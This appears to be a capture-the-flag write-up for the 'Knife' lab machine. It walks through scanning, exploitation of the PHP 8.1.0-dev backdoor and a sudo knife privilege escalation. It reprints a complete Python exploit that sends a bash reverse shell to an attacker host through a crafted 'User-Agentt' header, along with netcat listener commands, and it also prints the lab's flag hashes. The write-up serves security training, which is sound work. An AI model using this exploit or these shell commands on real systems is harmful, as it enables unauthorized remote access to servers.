Knife

TARGET IP: 10.10.10.242
HOST IP: 10.10.16.3
RECON
WEBSITE
http://[TARGET IP]

The page seems like a typical medical page. The source code for the page doesn't have anything to note except for some javascript that takes care of the styling when you first log into the page.
I'll also note that there are no links on this page or noted in the source code. Other than third-party links.

Looks like we have a lot of good information from Wappalyzer.
Apache Web Server V2.4.41
Backend --> PHP v8.1.0
This is the route we need to go with. It doesn't have it here but the version is v8.1.0dev
OS --> Ubuntu
After a quick google search, it appears that the Apache Web server has several vulnerabilities. Metasploit might even have a module to exploit it.
From the Gobuster Scan below, I found a
/index.php
page.This is just the same home page.
NMAP
nmap [TARGET IP]

nmap [TARGET IP] -A -p 22,80

We can confirm that the Apache web Server is using V2.4.41
sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80

NIKTO
First time using nikto here and interesting tool.
nikto 10.10.10.242

This shows that the PHP version used is
8.1.0-dev
A quick google search shows that this is a development version of PHP and has a major vulnerability.
ENUMERATION
GOBUSTER
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt

gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt -x php

gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt

EXPLOITATION
Let's dive into possible exploitations for the Apache version.
The Apache website actually has a list of all vulnerabilities which is really handy.
Nothing sticks out specifically for this version but it looks like the version may still be susceptible to multiple attacks.
I'm pretty sure this is not the route to go.
Let's take a look
METASPLOIT
Tried a few exploits available but nothing really stuck.
No luck here with Apache.
PHP
From the Nikto scan I found that the PHP version is 8.1.0-dev which has a major vulnerability that allows for a backdoor into the server.
I found a really useful python script that creates a reverse shell using this backdoor.
# Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# - https://hub.docker.com/r/phpdaily/php
# - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# CVE : N/A
# References:
# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
Usage:
python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port>
"""
#!/usr/bin/env python3
import os, sys, argparse, requests
request = requests.Session()
def check_target(args):
response = request.get(args.url)
for header in response.headers.items():
if "PHP/8.1.0-dev" in header[1]:
return True
return False
def reverse_shell(args):
payload = 'bash -c \"bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\"'
injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)
def main():
parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp <attacker PORT>")
parser.add_argument("url", metavar='<target URL>', help="Target URL")
parser.add_argument("lhost", metavar='<attacker IP>', help="Attacker listening IP",)
parser.add_argument("lport", metavar='<attacker PORT>', help="Attacker listening port")
args = parser.parse_args()
if check_target(args):
reverse_shell(args)
else:
print("Host is not available or vulnerable, aborting...")
exit
if __name__ == "__main__":
main()
I created a new file with the code snippet above and ran the following.
nc -lvnp 4444
python3 exploit.py http://[TARGET IP] [HOST IP] 4444
Return back to your netcat listener and you should now have access to the system.
Here is the user flag.
58a976dbd2240852f6910cab079cc7df
PRIVILEGE ESCALATION
Start with allowable sudo privileges.
sudo -l

Let's go check out GTFOBins for a possible route to escalation.
sudo knife exec -E 'exec "/bin/sh"'
cat /root/root.txt
c0a6dfc2f007265b4eafecf32efebab9
Last updated